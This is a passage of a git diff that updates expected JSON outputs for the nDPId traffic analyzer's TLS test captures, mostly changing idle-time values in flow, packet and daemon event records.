pbnMuY29tggoqLmxpdmUubmV0ggkqLm1zbi5jb22CDSoubXNuLWludC5jb22CGiouZjFkcy5zaGFyZWQubGl2ZS1pbnQuY29tghQqLmYxZHMud2x4cnMtaW50LmNvbYIVKi5zaGFyZWQubGl2ZS1pbnQuY29tghEqLnNoYXJlZC5saXZlLmNvbYIPKi5taWNyb3NvZnQuY29tggoqLmxpdmUuY29tgg4qLmxpdmUtaW50LmNvbYILKi53bHhycy5jb22CDyoud2x4cnMtaW50LmNvbYIOKi5zdC5zLW1zbi5jb22CDyouc3RiLnMtbXNuLmNvbYIgaW1hZ2VzLm1veHkud2luZG93c3Bob25lLWludC5jb22CECoud2x4cnN1LWludC5jb22CI2ltYWdlcy5wYXJ0bmVyLndpbmRvd3NwaG9uZS1pbnQuY29tgh9pbWFnZXMucGFydG5lci53aW5kb3dzcGhvbmUuY29tggwqLmpwLm1zbi5jb22CEiouYzNzY3MuanAubXNuLmNvbYIPKi5hc3BuZXRjZG4uY29tgg0qLmhvdG1haWwuY29tgiEqLnBhcnRuZXItZGYud2luZG93c3Bob25lLWludC5jb22CCyoucy1tc24uY29tgg4qLmxpdmUtaW50Lm5ldIIWKi53aW5kb3dzcGhvbmUtaW50LmNvbYISKi53aW5kb3dzcGhvbmUuY29tgiEqLnBhcnRuZXI="} -03337{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"tls-rdn-extract.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":946681200000,"flow_last_seen":946681200000,"flow_idle_time":7440000,"flow_min_l4_payload_len":127,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":6881,"flow_avg_l4_payload_len":1146,"midstream":1,"thread_ts_msec":946681200000,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"213.199.149.251","src_port":31337,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"9": {"risk":"TLS Expired Certificate","severity":"High","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"ads1.msads.net","server_names":"*.vo.msecnd.net,*.officeapps.live.com,*.msads.net,*.ads2.msads.net,*.stc.s-msn.com,cdn.dc2files.*.livefilestore-int.com,cdn.*.livefilestore.com,*.marketplace.windowsmobile.com,*.marketplace.windowsmobile-int.com,*.marketplace.windowsmobile-perf.com,*.stj.s-msn.com,ajax.microsoft.com,*.microsoft-sbs-domains.com,*.live.net,*.msn.com,*.msn-int.com,*.f1ds.shared.live-int.com,*.f1ds.wlxrs-int.com,*.shared.live-int.com,*.shared.live.com,*.microsoft.com,*.live.com,*.live-int.com,*.wlxrs.com,*.wlxrs-int.com,*.st.s-msn.com,*.stb.s-msn.com,images.moxy.windowsphone-int.com,*.wlxrsu-int.com,images.partner.windowsphone-int.com,images.partner.windowsphone.com,*.jp.msn.com,*.c3scs.jp.msn.com,*.aspnetcdn.com,*.hotmail.com,*.partner-df.windowsphone-int.com,*.s-msn.com,*.live-int.net,*.windowsphone-int.com,*.windowsphone.com,*.partner-pc.windowsphone-int.com,*.manage.microsoft.com","ja3":"2201d8e006f8f005a6b415f61e677532","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","issuerDN":"CN=Microsoft Secure Server Authority","subjectDN":"C=US, L=Redmond, O=Microsoft, OU=GFS, CN=*.officeapps.live.com, CN=*.msads.net, CN=*.ads2.msads.net, CN=*.stc.s-msn.com, CN=cdn.dc2files.*.livefilestore-int.com, CN=cdn.*.livefilestore.com, CN=*.marketplace.windowsmobile.com, CN=*.marketplace.windowsmobile-int.com, CN=*.marketplace.windowsmobile-perf.com, CN=*.stj.s-msn.com, CN=ajax.microsoft.com, CN=*.microsoft-sbs-domains.com, CN=*.live.net, CN=*.msn.com, CN=*.msn-int.com, CN=*.f1ds.shared.live-int.com, CN=*.f1ds.wlxrs-int.com, CN=*.shared.live-int.com, CN=*.shared.live.com, CN=*.microsoft.com, CN=*.live.com, CN=*.live-int.com, CN=*.wlxrs.com, CN=*.wlxrs-int.com, CN=*.st.s-msn.com, CN=*.stb.s-msn.com, CN=images.moxy.windowsphone-int.com, CN=*.wlxrsu-int.com, CN=images.partner.windowsphone-int.com, CN=images.partner.windowsphone.com, CN=*.jp.msn.com, CN=*.c3scs.jp.msn.com, CN=*.aspnetcdn.com, CN=*.hotmail.com, CN=*.partner-df.windowsphone-int.com, CN=*.s-msn.com, CN=*.live-int.net, CN=*.windowsphone-int.com, CN=*.windowsphone.com, CN=*.partner-pc.windowsphone-int.com, CN=*.manage.microsoft.com, CN=*.vo.msecnd.net","fingerprint":"FF:BF:9A:69:8F:C8:44:FF:89:F2:61:49:A7:D1:9A:98:DE:32:84:3B"}} -01038{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6,"source":"tls-rdn-extract.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":946681200000,"flow_last_seen":946681200000,"flow_idle_time":7440000,"flow_min_l4_payload_len":127,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":6881,"flow_avg_l4_payload_len":1146,"midstream":1,"thread_ts_msec":946681200000,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"213.199.149.251","src_port":31337,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"9": {"risk":"TLS Expired Certificate","severity":"High","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Web"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"tls-rdn-extract.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946681200000,"flow_last_seen":946681200000,"flow_idle_time":7560000,"flow_min_l4_payload_len":127,"flow_max_l4_payload_len":127,"flow_tot_l4_payload_len":127,"flow_avg_l4_payload_len":127,"midstream":1,"thread_ts_msec":946681200000,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"213.199.149.251","src_port":31337,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00631{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"tls-rdn-extract.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":946681200000,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":181,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":181,"pkt_l4_len":147,"thread_ts_msec":946681200000,"pkt":"ERERERERIiIiIiIiCABFAACnLudAAIAGnZoKAAAB1ceV+3ppAbtkZ4Ye79i2a1AYQCmgXgAAFgMBAHoBAAB2AwEAAAAAM7RDB2u\/HXE+9PsbFMYgy+4A2s6CH4THeQytZwAAGAAvADUABQAKwBPAFMAJwAoAMgA4ABMABAEAADX\/AQABAAAAABMAEQAADmFkczEubXNhZHMubmV0AAUABQEAAAAAAAoABgAEABcAGAALAAIBAA=="} +00951{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"tls-rdn-extract.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946681200000,"flow_last_seen":946681200000,"flow_idle_time":7560000,"flow_min_l4_payload_len":127,"flow_max_l4_payload_len":127,"flow_tot_l4_payload_len":127,"flow_avg_l4_payload_len":127,"midstream":1,"thread_ts_msec":946681200000,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"213.199.149.251","src_port":31337,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"ads1.msads.net","ja3":"2201d8e006f8f005a6b415f61e677532","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +02414{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"tls-rdn-extract.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":946681200000,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946681200000,"pkt":"ERERERERIiIiIiIiCABFAAXc5PJAADUGLVrVx5X7CgAAAQG7emnv2LZrZGeGnVAQGJhAQwAAFgMBAEoCAABGAwEAAAAAWuuHTEcV+akd0cdt\/mCIl2W0D3ZsYen8qlKhhyDexkYNJNvmICdLfXfmBpGxedPIi6ruP\/C4V2lgLy7HPwAvABYDARoFCwAaAQAZ\/gAOyDCCDsQwgg2soAMCAQICCmkXyLYACAACTA8wDQYJKoZIhvcNAQEFBQAwgYsxEzARBgoJkiaJk\/IsZAEZFgNjb20xGTAXBgoJkiaJk\/IsZAEZFgltaWNyb3NvZnQxFDASBgoJkiaJk\/IsZAEZFgRjb3JwMRcwFQYKCZImiZPyLGQBGRYHcmVkbW9uZDEqMCgGA1UEAxMhTWljcm9zb2Z0IFNlY3VyZSBTZXJ2ZXIgQXV0aG9yaXR5MB4XDTExMTAyMTE2NDIwM1oXDTEzMTAyMDE2NDIwM1owggVRMQswCQYDVQQGEwJVUzEQMA4GA1UEBxMHUmVkbW9uZDESMBAGA1UEChMJTWljcm9zb2Z0MQwwCgYDVQQLEwNHRlMxHjAcBgNVBAMMFSoub2ZmaWNlYXBwcy5saXZlLmNvbTEUMBIGA1UEAwwLKi5tc2Fkcy5uZXQxGTAXBgNVBAMMECouYWRzMi5tc2Fkcy5uZXQxGDAWBgNVBAMMDyouc3RjLnMtbXNuLmNvbTEtMCsGA1UEAwwkY2RuLmRjMmZpbGVzLioubGl2ZWZpbGVzdG9yZS1pbnQuY29tMSAwHgYDVQQDDBdjZG4uKi5saXZlZmlsZXN0b3JlLmNvbTEoMCYGA1UEAwwfKi5tYXJrZXRwbGFjZS53aW5kb3dzbW9iaWxlLmNvbTEsMCoGA1UEAwwjKi5tYXJrZXRwbGFjZS53aW5kb3dzbW9iaWxlLWludC5jb20xLTArBgNVBAMMJCoubWFya2V0cGxhY2Uud2luZG93c21vYmlsZS1wZXJmLmNvbTEYMBYGA1UEAwwPKi5zdGoucy1tc24uY29tMRswGQYDVQQDExJhamF4Lm1pY3Jvc29mdC5jb20xJDAiBgNVBAMMGyoubWljcm9zb2Z0LXNicy1kb21haW5zLmNvbTETMBEGA1UEAwwKKi5saXZlLm5ldDESMBAGA1UEAwwJKi5tc24uY29tMRYwFAYDVQQDDA0qLm1zbi1pbnQuY29tMSMwIQYDVQQDDBoqLmYxZHMuc2hhcmVkLmxpdmUtaW50LmNvbTEdMBsGA1UEAwwUKi5mMWRzLndseHJzLWludC5jb20xHjAcBgNVBAMMFSouc2hhcmVkLmxpdmUtaW50LmNvbTEaMBgGA1UEAwwRKi5zaGFyZWQubGl2ZS5jb20xGDAWBgNVBAMMDyoubWljcm9zb2Z0LmNvbTETMBEGA1UEAwwKKi5saXZlLmNvbTEXMBUGA1UEAwwOKi5saXZlLWludC5jb20xFDASBgNVBAMMCyoud2x4cnMuY29tMRgwFgYDVQQDDA8qLndseHJzLWludC5jb20xFzAVBgNVBAMMDiouc3Qucy1tc24uY29tMRgwFgYDVQQDDA8qLnN0Yi5zLW1zbi5jb20xKTAnBgNVBAMTIGltYWdlcy5tb3h5LndpbmRvd3NwaG9uZS1pbnQuY29tMRkwFwYDVQQDDBAqLndseHJzdS1pbnQuY29tMSwwKgYDVQQDEyNpbWFnZXMucGFydG5lci53aW5kb3dzcGhvbmUtaW50LmNvbTEoMCYGA1UEAxMfaW1hZ2VzLnBhcnRuZXIud2luZG93c3Bob25lLmNvbTEVMBMGA1UEAwwMKi5qcC5tc24uY29tMRswGQYDVQQDDBIqLmMzc2NzLmpwLm1zbi5jb20xGDAWBgNVBAMMDyouYXNwbmV0Y2RuLmNvbTEWMBQGA1UEAwwNKi5ob3RtYWlsLmNvbTEqMCgGA1UEAwwhKi5wYXJ0bmVyLWRmLndpbmRvd3NwaG9uZS1pbnQuY28="} +01101{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2,"source":"tls-rdn-extract.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946681200000,"flow_last_seen":946681200000,"flow_idle_time":7560000,"flow_min_l4_payload_len":127,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1587,"flow_avg_l4_payload_len":793,"midstream":1,"thread_ts_msec":946681200000,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"213.199.149.251","src_port":31337,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"ads1.msads.net","ja3":"2201d8e006f8f005a6b415f61e677532","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA"}} +02411{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"tls-rdn-extract.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":946681200000,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946681200000,"pkt":"ERERERERIiIiIiIiCABFAAXc5PNAADUGLVnVx5X7CgAAAQG7emnv2LwfZGeGnVAQGJjDXgAAbTEUMBIGA1UEAwwLKi5zLW1zbi5jb20xFzAVBgNVBAMMDioubGl2ZS1pbnQubmV0MR8wHQYDVQQDDBYqLndpbmRvd3NwaG9uZS1pbnQuY29tMRswGQYDVQQDDBIqLndpbmRvd3NwaG9uZS5jb20xKjAoBgNVBAMMISoucGFydG5lci1wYy53aW5kb3dzcGhvbmUtaW50LmNvbTEfMB0GA1UEAwwWKi5tYW5hZ2UubWljcm9zb2Z0LmNvbTEYMBYGA1UEAwwPKi52by5tc2VjbmQubmV0MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAuX3PkoiInBfw68+6JNH406C4alrEnikcq1FZEZJZj8A0h7uDLWO01R+9CYljtZsYv4E+pfWvi8Z31QoN\/mqJYHgutax6\/UWMDIxFsXaIn1iXAoBA481Pyqa8XbzdmibAvotkEOm0ksJYJlu7VrGuQP+fyz69HW2nTnewmEyTsEy9pTZjqsxFdtBcWm2sS5KQA3Hoj6NzWl54VkXacUcpgQraZZFiSKVJpxhZpAqND3x7NCgSdQvwN2uTFwRCsRagxmCSSaZkQSbYCDh7lvCo6r5wBODibkMqCxrJ4nyg5Uw+J74SsSHhtBMkb6YMlWe5gPOyYSZfIVCby4onZWx45wIDAQABo4IGXzCCBlswDAYDVR0TAQH\/BAIwADALBgNVHQ8EBAMCBLAwHQYDVR0lBBYwFAYIKwYBBQUHAwIGCCsGAQUFBwMBMIIDowYDVR0RBIIDmjCCA5aCDyoudm8ubXNlY25kLm5ldIIVKi5vZmZpY2VhcHBzLmxpdmUuY29tggsqLm1zYWRzLm5ldIIQKi5hZHMyLm1zYWRzLm5ldIIPKi5zdGMucy1tc24uY29tgiRjZG4uZGMyZmlsZXMuKi5saXZlZmlsZXN0b3JlLWludC5jb22CF2Nkbi4qLmxpdmVmaWxlc3RvcmUuY29tgh8qLm1hcmtldHBsYWNlLndpbmRvd3Ntb2JpbGUuY29tgiMqLm1hcmtldHBsYWNlLndpbmRvd3Ntb2JpbGUtaW50LmNvbYIkKi5tYXJrZXRwbGFjZS53aW5kb3dzbW9iaWxlLXBlcmYuY29tgg8qLnN0ai5zLW1zbi5jb22CEmFqYXgubWljcm9zb2Z0LmNvbYIbKi5taWNyb3NvZnQtc2JzLWRvbWFpbnMuY29tggoqLmxpdmUubmV0ggkqLm1zbi5jb22CDSoubXNuLWludC5jb22CGiouZjFkcy5zaGFyZWQubGl2ZS1pbnQuY29tghQqLmYxZHMud2x4cnMtaW50LmNvbYIVKi5zaGFyZWQubGl2ZS1pbnQuY29tghEqLnNoYXJlZC5saXZlLmNvbYIPKi5taWNyb3NvZnQuY29tggoqLmxpdmUuY29tgg4qLmxpdmUtaW50LmNvbYILKi53bHhycy5jb22CDyoud2x4cnMtaW50LmNvbYIOKi5zdC5zLW1zbi5jb22CDyouc3RiLnMtbXNuLmNvbYIgaW1hZ2VzLm1veHkud2luZG93c3Bob25lLWludC5jb22CECoud2x4cnN1LWludC5jb22CI2ltYWdlcy5wYXJ0bmVyLndpbmRvd3NwaG9uZS1pbnQuY29tgh9pbWFnZXMucGFydG5lci53aW5kb3dzcGhvbmUuY29tggwqLmpwLm1zbi5jb22CEiouYzNzY3MuanAubXNuLmNvbYIPKi5hc3BuZXRjZG4uY29tgg0qLmhvdG1haWwuY29tgiEqLnBhcnRuZXItZGYud2luZG93c3Bob25lLWludC5jb22CCyoucy1tc24uY29tgg4qLmxpdmUtaW50Lm5ldIIWKi53aW5kb3dzcGhvbmUtaW50LmNvbYISKi53aW5kb3dzcGhvbmUuY29tgiEqLnBhcnRuZXI="} +03337{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"tls-rdn-extract.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":946681200000,"flow_last_seen":946681200000,"flow_idle_time":7560000,"flow_min_l4_payload_len":127,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":6881,"flow_avg_l4_payload_len":1146,"midstream":1,"thread_ts_msec":946681200000,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"213.199.149.251","src_port":31337,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"9": {"risk":"TLS Expired Certificate","severity":"High","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"ads1.msads.net","server_names":"*.vo.msecnd.net,*.officeapps.live.com,*.msads.net,*.ads2.msads.net,*.stc.s-msn.com,cdn.dc2files.*.livefilestore-int.com,cdn.*.livefilestore.com,*.marketplace.windowsmobile.com,*.marketplace.windowsmobile-int.com,*.marketplace.windowsmobile-perf.com,*.stj.s-msn.com,ajax.microsoft.com,*.microsoft-sbs-domains.com,*.live.net,*.msn.com,*.msn-int.com,*.f1ds.shared.live-int.com,*.f1ds.wlxrs-int.com,*.shared.live-int.com,*.shared.live.com,*.microsoft.com,*.live.com,*.live-int.com,*.wlxrs.com,*.wlxrs-int.com,*.st.s-msn.com,*.stb.s-msn.com,images.moxy.windowsphone-int.com,*.wlxrsu-int.com,images.partner.windowsphone-int.com,images.partner.windowsphone.com,*.jp.msn.com,*.c3scs.jp.msn.com,*.aspnetcdn.com,*.hotmail.com,*.partner-df.windowsphone-int.com,*.s-msn.com,*.live-int.net,*.windowsphone-int.com,*.windowsphone.com,*.partner-pc.windowsphone-int.com,*.manage.microsoft.com","ja3":"2201d8e006f8f005a6b415f61e677532","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","issuerDN":"CN=Microsoft Secure Server Authority","subjectDN":"C=US, L=Redmond, O=Microsoft, OU=GFS, CN=*.officeapps.live.com, CN=*.msads.net, CN=*.ads2.msads.net, CN=*.stc.s-msn.com, CN=cdn.dc2files.*.livefilestore-int.com, CN=cdn.*.livefilestore.com, CN=*.marketplace.windowsmobile.com, CN=*.marketplace.windowsmobile-int.com, CN=*.marketplace.windowsmobile-perf.com, CN=*.stj.s-msn.com, CN=ajax.microsoft.com, CN=*.microsoft-sbs-domains.com, CN=*.live.net, CN=*.msn.com, CN=*.msn-int.com, CN=*.f1ds.shared.live-int.com, CN=*.f1ds.wlxrs-int.com, CN=*.shared.live-int.com, CN=*.shared.live.com, CN=*.microsoft.com, CN=*.live.com, CN=*.live-int.com, CN=*.wlxrs.com, CN=*.wlxrs-int.com, CN=*.st.s-msn.com, CN=*.stb.s-msn.com, CN=images.moxy.windowsphone-int.com, CN=*.wlxrsu-int.com, CN=images.partner.windowsphone-int.com, CN=images.partner.windowsphone.com, CN=*.jp.msn.com, CN=*.c3scs.jp.msn.com, CN=*.aspnetcdn.com, CN=*.hotmail.com, CN=*.partner-df.windowsphone-int.com, CN=*.s-msn.com, CN=*.live-int.net, CN=*.windowsphone-int.com, CN=*.windowsphone.com, CN=*.partner-pc.windowsphone-int.com, CN=*.manage.microsoft.com, CN=*.vo.msecnd.net","fingerprint":"FF:BF:9A:69:8F:C8:44:FF:89:F2:61:49:A7:D1:9A:98:DE:32:84:3B"}} +01038{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6,"source":"tls-rdn-extract.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":946681200000,"flow_last_seen":946681200000,"flow_idle_time":7560000,"flow_min_l4_payload_len":127,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":6881,"flow_avg_l4_payload_len":1146,"midstream":1,"thread_ts_msec":946681200000,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"213.199.149.251","src_port":31337,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"9": {"risk":"TLS Expired Certificate","severity":"High","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Web"}} 00557{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":6,"source":"tls-rdn-extract.pcap","alias":"nDPId-test","packets-captured":6,"packets-processed":6,"total-skipped-flows":0,"total-l4-data-len":6881,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":2,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":11,"global_ts_msec":946681200000} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 6/6 diff --git a/test/results/tls_alert.pcap.out b/test/results/tls_alert.pcap.out index 84637d4a9..ec200aa9b 100644 --- a/test/results/tls_alert.pcap.out +++ b/test/results/tls_alert.pcap.out @@ -1,11 +1,11 @@ 00460{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"tls_alert.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00546{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"tls_alert.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1628259176203} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"tls_alert.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1628259176203,"flow_last_seen":1628259176203,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1628259176203,"l3_proto":"ip4","src_ip":"192.168.1.192","dst_ip":"192.168.1.20","src_port":63158,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"tls_alert.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1628259176203,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1628259176203,"pkt":"AICPmq69oM7IELEuCABFAABAAABAAEAGtpPAqAHAwKgBFPa2AbvtIEkOAAAAALAC\/\/9MagAAAgQFtAEDAwUBAQgKE9Ij+wAAAAAEAgAA"} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"tls_alert.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1628259176203,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1628259176203,"pkt":"oM7IELEuAICPmq69CABFAAA8AABAAEAGtpfAqAEUwKgBwAG79rbEoc1F7SBJD6AScSBz9QAAAgQFtAQCCAoAseWtE9Ij+wEDAwc="} -00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"tls_alert.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1628259176203,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1628259176203,"pkt":"AICPmq69oM7IELEuCABFAAA0AABAAEAGtp\/AqAHAwKgBFPa2AbvtIEkPxKHNRoAQEBUDzQAAAQEIChPSI\/sAseWt"} -01038{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"tls_alert.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1628259176203,"flow_last_seen":1628259176204,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":199,"flow_tot_l4_payload_len":199,"flow_avg_l4_payload_len":49,"midstream":0,"thread_ts_msec":1628259176204,"l3_proto":"ip4","src_ip":"192.168.1.192","dst_ip":"192.168.1.20","src_port":63158,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1","client_requested_server_name":"www.google-analytics.com","ja3":"d78489b860c8bf7838a6ff0b4d131541","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} -00584{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11,"source":"tls_alert.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1628259176203,"flow_last_seen":1628259176206,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":199,"flow_tot_l4_payload_len":206,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1628259176206,"l3_proto":"ip4","src_ip":"192.168.1.192","dst_ip":"192.168.1.20","src_port":63158,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 